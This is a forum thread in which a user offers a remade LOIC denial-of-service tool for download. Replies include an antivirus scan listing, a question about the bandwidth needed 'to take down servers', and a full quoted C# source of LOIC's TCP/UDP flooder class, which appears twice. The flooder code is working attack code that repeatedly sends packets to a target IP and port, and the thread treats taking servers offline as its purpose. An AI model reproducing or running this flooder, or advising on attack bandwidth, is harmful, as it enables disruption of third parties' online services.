Jump to content

Recommended Posts

Posted

LOIC Version 2 is ready!

I got the project, and i remake it, translated it to into Visual Basic.Net,

Also have updated the skin, and buttons, and 15% more powerful than old.

 

Those are the changes from the Version 1.

 

Preview:

 

i1fyqa.jpg

 

Credits: Me

 

Downloads:

Sourceforge.net - Mirror

Posted

from when dos/ddos tools and hacking shits allowed in forum? :D

That's true and you should post that in vip section anyway.

Virus scan ?

Posted

That's true and you should post that in vip section anyway.

Virus scan ?

 



Update




AhnLab-V3

-

20120425



AntiVir

-

20120425



Antiy-AVL

-

20120425



Avast

-

20120426



AVG

-

20120426



BitDefender

-

20120426



ByteHero

-

20120424



CAT-QuickHeal

-

20120425



ClamAV

HackTool.DDOS.LOIC-2

20120426



Commtouch

-

20120426



Comodo

-

20120426



DrWeb

-

20120426



Emsisoft

HackTool.Win32.Oylecann!IK

20120426



eSafe

-

20120425



eTrust-Vet

-

20120425



F-Prot

-

20120425



F-Secure

-

20120426



Fortinet

-

20120426



GData

-

20120426



Ikarus

HackTool.Win32.Oylecann

20120426



Jiangmin

-

20120425



K7AntiVirus

-

20120425



Kaspersky

HEUR:HackTool.MSIL.Flooder.gen

20120426



McAfee

Artemis!395EB361322D

20120426



McAfee-GW-Edition

Artemis!395EB361322D

20120425



Microsoft

-

20120426



NOD32

-

20120426



Norman

-

20120425



nProtect

-

20120425



Panda

-

20120425



PCTools

-

20120424



Rising

-

20120425



Sophos

Troj/Loic-A

20120426



SUPERAntiSpyware

-

20120402



Symantec

-

20120426



TheHacker

-

20120425



TrendMicro

-

20120425



TrendMicro-HouseCall

-

20120426



VBA32

-

20120425



VIPRE

-

20120425



ViRobot

-

20120425



VirusBuster

-

20120425

 

DDOS Tool, Hacking Tool, LOIC, go to google.com screenshoots to looking at there, LOIC V1, all ppl was downloaded it the same details have shown, it's not a clean virus, it's a ddos tool ^.^ i had builded from my vb.net, also, i am using it too, and as well, i will soon start making the new version of this tool (V3). Go search at google man. You will see ^.^ !

Posted

In my net i can have UPLOAD more than 100Mbps(Private Network), why with program i get only 15Mbps? Maby program is bad coded?

 

And, what speed i must have to take down servers;

MySpeed > ISP Speed?

 

 

  • 1 year later...
Posted

can some1 answer me i'm noob at this but when i donwloaded it , my anti-virus said it is an virus i know the ant-virus always say's that with hacking tools but i'm scarred this is a real virus with a keylogger and his going to steal my personal information. can somebody check it if it contains a keylogger or something?

 

-ps sry for my bad english

Posted (edited)

Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care.

 

You can't convert everything from Java/C#/C++ to vb.net. 

 

And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: 

using System;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace LOIC
{
        public class XXPFlooder
        {
                public bool IsFlooding;
                public int FloodCount;
                public string IP;
                public int Port;
                public int Protocol;
                public int Delay;
                public bool Resp;
                public string Data;
                private bool AllowRandom;

                public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random)
                {
                        this.IP = ip;
                        this.Port = port;
                        this.Protocol = proto;
                        this.Delay = delay;
                        this.Resp = resp;
                        this.Data = data;
                        this.AllowRandom = random;
                }
                public void Start()
                {
                        IsFlooding = true;
                        BackgroundWorker bw = new BackgroundWorker();
                        bw.DoWork += new DoWorkEventHandler(bw_DoWork);
                        bw.RunWorkerAsync();
                }
                private void bw_DoWork(object sender, DoWorkEventArgs e)
                {
                        try
                        {
                                byte[] buf;
                                IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port);
                                while (IsFlooding)
                                {
                                        Socket socket = null;
                                        if (Protocol == 1)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                                                socket.NoDelay = true;

                                                try { socket.Connect(RHost); }
                                                catch { continue; }

                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.Send(buf);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                        if (Protocol == 2)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.SendTo(buf, SocketFlags.None, RHost);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                }
                        }
                        catch { }
                }
        }
}
Edited by Aphelion
Posted

 

Because simply it's fake, probably he inserted some viruses in it, dunno and I dont care.

 

You can't convert everything from Java/C#/C++ to vb.net. 

 

And just to be sure(if a Java/C#/C++, vb.net developer can confirm it), here is the source code of it: 

using System;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Text;

namespace LOIC
{
        public class XXPFlooder
        {
                public bool IsFlooding;
                public int FloodCount;
                public string IP;
                public int Port;
                public int Protocol;
                public int Delay;
                public bool Resp;
                public string Data;
                private bool AllowRandom;

                public XXPFlooder(string ip, int port, int proto, int delay, bool resp, string data, bool random)
                {
                        this.IP = ip;
                        this.Port = port;
                        this.Protocol = proto;
                        this.Delay = delay;
                        this.Resp = resp;
                        this.Data = data;
                        this.AllowRandom = random;
                }
                public void Start()
                {
                        IsFlooding = true;
                        BackgroundWorker bw = new BackgroundWorker();
                        bw.DoWork += new DoWorkEventHandler(bw_DoWork);
                        bw.RunWorkerAsync();
                }
                private void bw_DoWork(object sender, DoWorkEventArgs e)
                {
                        try
                        {
                                byte[] buf;
                                IPEndPoint RHost = new System.Net.IPEndPoint(System.Net.IPAddress.Parse(IP), Port);
                                while (IsFlooding)
                                {
                                        Socket socket = null;
                                        if (Protocol == 1)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
                                                socket.NoDelay = true;

                                                try { socket.Connect(RHost); }
                                                catch { continue; }

                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.Send(buf);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                        if (Protocol == 2)
                                        {
                                                socket = new Socket(AddressFamily.InterNetwork, SocketType.Dgram, ProtocolType.Udp);
                                                socket.Blocking = Resp;
                                                try
                                                {
                                                        while (IsFlooding)
                                                        {
                                                                FloodCount++;
                                                                buf = System.Text.Encoding.ASCII.GetBytes(String.Concat(Data, (AllowRandom ? Functions.RandomString() : null) ));
                                                                socket.SendTo(buf, SocketFlags.None, RHost);
                                                                if (Delay >= 0) System.Threading.Thread.Sleep(Delay+1);
                                                        }
                                                }
                                                catch { }
                                        }
                                }
                        }
                        catch { }
                }
        }
}

 

 

this isn't java, its C#

 

Few differences

 

 

using instead of import
bool Resp; instead of boolean Resp;
string Data; instead of String

 

So since C# is .net language I see it possible to be done.

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Posts

    • WIPE ! NEW SEASON GRAND OPENING FROM TODAY ! - 23/01/2026, FRIDAY, 20:00 +3 GMT !
    • https://vpslab.cloud/ Premium DDoS Protection now included with every server.
    • # Changelog - Public Updates   This changelog tracks user-facing updates and improvements to Top.MaxCheaters.com.   ---   ## [1.2.0] - 2026-01-XX   ### ⚡ Performance Improvements - **Faster Page Loads**: Implemented intelligent caching system that makes pages load significantly faster - **My Servers Page**: Now loads instantly when revisiting (no more loading delays) - **Main Page**: Server listings and filters now load faster on repeat visits - **Premium Ads**: Pricing information loads instantly - **Overall Performance**: Site now loads 60-80% faster with reduced server load   ### 🔄 Improvements - Pages now remember recent data, reducing wait times when navigating - Automatic cache refresh ensures you always see up-to-date information - Better user experience with instant page loads on repeat visits   ---   ## [1.1.1] - 2026-01-XX   ### 🐛 Bug Fixes - **VIP Server Filter**: Fixed "VIP L2 Servers" filter to correctly show all premium tier servers (VIP, Gold VIP, and Pinned) - **Ad Pricing Display**: Fixed ad pricing on Premium Ads page to automatically update when changed in admin panel   ### 🔄 Improvements - Ad pricing now syncs automatically across all pages - More accurate server filtering by tier   ---   ## [1.1.0] - 2026-01-XX   ### ✨ New Features - **Complete Chronicle List**: All chronicle options are now available in server forms and filters, including the latest Lineage 2 chronicles - **Improved Chronicle Display**: Server rows now show cleaner, shorter chronicle names for better readability   ### 🐛 Bug Fixes - **Chronicle Filter**: Fixed issue where "Infinite Odyssey" chronicle filter was not working correctly - **Missing Chronicles**: Fixed missing chronicle options in server creation and editing forms   ### 🔄 Improvements - Chronicle filters and dropdowns now stay in sync with the latest available chronicles - Better chronicle name formatting in server listings for improved visual clarity   ---   ## [1.0.0] - Initial Release   ### Features - 🎮 Server listings with multiple tiers (Normal, VIP, Gold VIP, Pinned) - 📊 Click tracking and server statistics - 🌍 Multi-language support (English, Spanish, Portuguese, Greek, Russian) - 💳 Payment system for premium server features - 🔐 Secure authentication system - 👑 Admin panel for server management - 📱 Fully responsive design for all devices - 🔍 Advanced filtering system (by chronicle, rate, server type, date) - 📅 Server opening date tracking - 🎯 Two viewing modes: By Date and By Votes (coming soon for all users)   ---   ## About This Changelog   This changelog focuses on updates that directly impact the user experience. Internal development changes and technical improvements are not included here.   For questions or feedback, please contact support.v
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..